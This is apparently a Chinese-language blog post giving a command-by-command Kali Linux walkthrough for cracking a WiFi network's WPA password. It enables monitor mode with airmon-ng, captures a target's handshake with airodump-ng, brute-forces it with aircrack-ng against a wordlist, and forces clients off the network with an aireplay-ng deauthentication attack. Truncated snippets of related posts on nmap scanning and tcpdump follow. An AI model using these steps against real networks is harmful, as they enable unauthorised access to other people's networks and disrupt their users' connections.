監聽 掃瞄 抓包 跑包 aireplay斷網攻擊

2021-10-07 14:16:40 字數 1110 閱讀 3512

iwconfig 檢視無線網絡卡狀態 如果off需要開啟

ifconfig wlan0 up 啟動wlan0網絡卡

ifconfig wlan0 再次檢視無線網絡卡狀態

airmon-ng start wlan0 開啟監聽模式

iwconfig 檢查無線網絡卡狀態是否mon監聽

airodump-ng wlan0mon 掃瞄wifi網路

--------------監聽前網絡卡設定-------------------------------------

1.使用airmon-ng命令檢查網絡卡是否支援監聽模式

root@kali:~# airmon-ng

2.開啟無線網絡卡的監聽模式

root@kali:~# airmon-ng start wlan0

3.開啟監聽模式之後,無線介面wlan0變成了wlan0mon,可以使用ifconfig命令檢視

4.掃瞄環境中的wifi網路

root@kali:~# airodump-ng wlan0mon

當搜尋到我們想要破解的wifi熱點時可以 ctrl+c 停止搜尋。

5.抓取握手包

使用網絡卡的監聽模式抓取周圍的無線網路資料報,當有新使用者連線wifi時會傳送握手包。

root@kali:~# airodump-ng -c 4 --bssid aa:aa:aa:aa:aa:aa -w hach wlan0mon

aa:aa:aa:aa:aa:aa 路由的bssid

-c 指定通道,上面已經標記目標熱點的通道

-bssid指定目標路由器的bssid,就是上面標記的bssid

-w指定抓取的資料報儲存的目錄

6.進行破解wifi密碼(跑包)

root@kali:~#aircrack-ng -a2 -b aa:aa:aa:aa:aa:aa -w pass.txt hack-01.cap

抓不到握手包就aireplay-ng讓station下線重發握手包

root@kali:~#aireplay-ng -0 10 -a aa:aa:aa:aa:aa:aa -c bb:bb:bb:bb:bb:bb wlan0mon

-a 被攻擊路由的bssid

-c station的mac位址

掃瞄和抓包

掃瞄 向指定的主機傳送資料從而探測資訊 通過掃瞄可以獲取一些公開 非公開的資料,可以檢測潛在的風險,可以收集裝置 系統 軟體 主機資訊,發現可以利用的安全漏洞。nmap掃瞄 yum y install nmap 安裝軟體包 命令格式 nmap 掃瞄型別 選項 掃瞄目標 s scan sp 相當於pi...

掃瞄和抓包

用的工具為linux自帶的nmap和tcpdump,如果沒有請先安裝。nmap n 不做主機名解析 會加快掃瞄速度 掃瞄型別 選項 主機 st 全開 連線掃瞄 ss 半開 syn掃瞄 su udp掃瞄 a 全面掃瞄 sp ping 看這個範圍的埠哪些主機可以ping通 nmap sp 172.20....

掃瞄與抓包

掃瞄方式 scan 主動探測 sniff 被動監聽 嗅探 capture 資料報捕獲 抓包 掃瞄工具 nmap 協議分析 tcpdump nmap 一款強大的網路探測工具 ping掃瞄 多埠掃瞄 tcp ip指紋校驗 基本用法 nmap target host name 預設掃瞄tcp nmap s...